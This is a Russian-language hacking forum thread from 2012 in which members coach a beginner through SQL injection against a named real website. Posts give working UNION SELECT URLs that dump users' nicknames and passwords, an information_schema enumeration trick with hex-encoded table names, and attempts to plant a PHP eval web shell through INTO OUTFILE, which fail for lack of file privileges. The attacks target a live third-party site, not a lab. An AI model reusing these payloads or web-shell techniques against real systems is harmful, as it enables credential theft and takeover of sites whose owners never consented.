Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    убери хекс
     
  2. York

    York New Member

    Joined:
    6 Jan 2012
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    www.vizborclub.com/vizborclub/photos_albom.php?id=-51+union+select+1,2,3,login+from+'users'+limit+0,30+--+
    Без результатов
     
  3. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Зачем users в кавычках?

    P.S. Сейчас составлю правильный запрос.

    UPD. Держи:
    Code:
    http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1'+union+select+1,concat(nick,0x3a,password)+from+users+limit+0,1--+a
    UPD. Вот еще:
    http://forum.antichat.ru/thread43966.html
     
    #18943 Ereee, 9 Jan 2012
    Last edited: 9 Jan 2012
    1 person likes this.
  4. York

    York New Member

    Joined:
    6 Jan 2012
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Без ковычек тоже самое
     
  5. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    http://www.vizborclub.com/vizborclub/photos_albom.php?id=-51+union+select+1,2,3,password+from+users+limit+0,30+--+
    вот вывел пароли, логины так же, все пляшет
    и еше ери ссилка в лс
     
  6. York

    York New Member

    Joined:
    6 Jan 2012
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1'+union+select+1,concat(nick,0x3a,password)+from+ users+limit+0,1--+a
    Ничего не показал.
     
  7. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    потому-что колонки "nick" там нет
     
  8. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    [​IMG]
    К окулисту...


    2pirat0, есть.


    P.S. Не за что :(
     
    #18948 Ereee, 9 Jan 2012
    Last edited: 9 Jan 2012
  9. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    ))) а сори недосмотрел
     
  10. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    где можно прочитать о выводе данных, если таблица в другой базе?
    правильно я понял, мне это нужно?
     
    _________________________
    stepashka_ likes this.
  11. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    union+select+1,2,table_schema+from+information_sch ema.tables+where+table_name=0x6162635f75736572

    0x6162635f75736572 - подставь свой)
    кодировать тут - http://x3k.ru/
    wp_users будет - 0x77705f7573657273

    потом пишешь в запросе: база.wp_users
     
    #18951 stepashka_, 9 Jan 2012
    Last edited: 9 Jan 2012
    3 people like this.
  12. York

    York New Member

    Joined:
    6 Jan 2012
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Шелл не заливается :(
    Пробывал так:
    http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1%27+union+select+1,2,3,0x273c3f706870206576616c28245f4745545b20186520195d29203f3e27+INTO+OUTFILE+'1.php'+--+
    http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1%27+union+select+1,2,3,unhex(hex(0x273c3f706870206576616c28245f4745545b20186520195d29203f3e27))+INTO+OUTFILE+'1.php'+--+
    http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1%27+union+select+1,2,3,'<?php eval($_GET[‘e’]) ?>'+INTO+OUTFILE+'1.php'+--+
    Очередной раз прошу помощи у старших. Поймите, ведь лучше запоминается когда на практике..
     
  13. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    2York,
    прав нет.
     
  14. York

    York New Member

    Joined:
    6 Jan 2012
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Даже если я под админом зайду?
     
  15. York

    York New Member

    Joined:
    6 Jan 2012
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    А как я пойму что File_Prive=Y ? Содержимон страницы выведится?
     
  16. Чакэ

    Чакэ Elder - Старейшина

    Joined:
    15 Aug 2010
    Messages:
    260
    Likes Received:
    66
    Reputations:
    62
    да. или ошибку в случае если прав не хватит заглянуть в mysql.user
     
  17. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    у тебя в бд нету файловых прав. Чтобы они появились в твоем случае - нужен скрипт, который обращается к бд под юзвером, у которого они есть (а я сомневаюсь, что ты найдешь такой скрипт). Д и под каким админом то ты решил зайти?

    Зы. проще сначала понять что такое бд, и что за язык такой, через который идет обращение к ней. А уж потом приступать к практике (взлома).
     
  18. York

    York New Member

    Joined:
    6 Jan 2012
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Литературку посоветуете более понятную для новичка?)
     
  19. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Я тебе уже давал литературу в этом посте http://forum.antichat.ru/showpost.php?p=2971891&postcount=19143

    P.S. google
     
  20. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    а сам
    должен быть в кавычках, и это никак не обойти?
     
    _________________________
Thread Status:
Not open for further replies.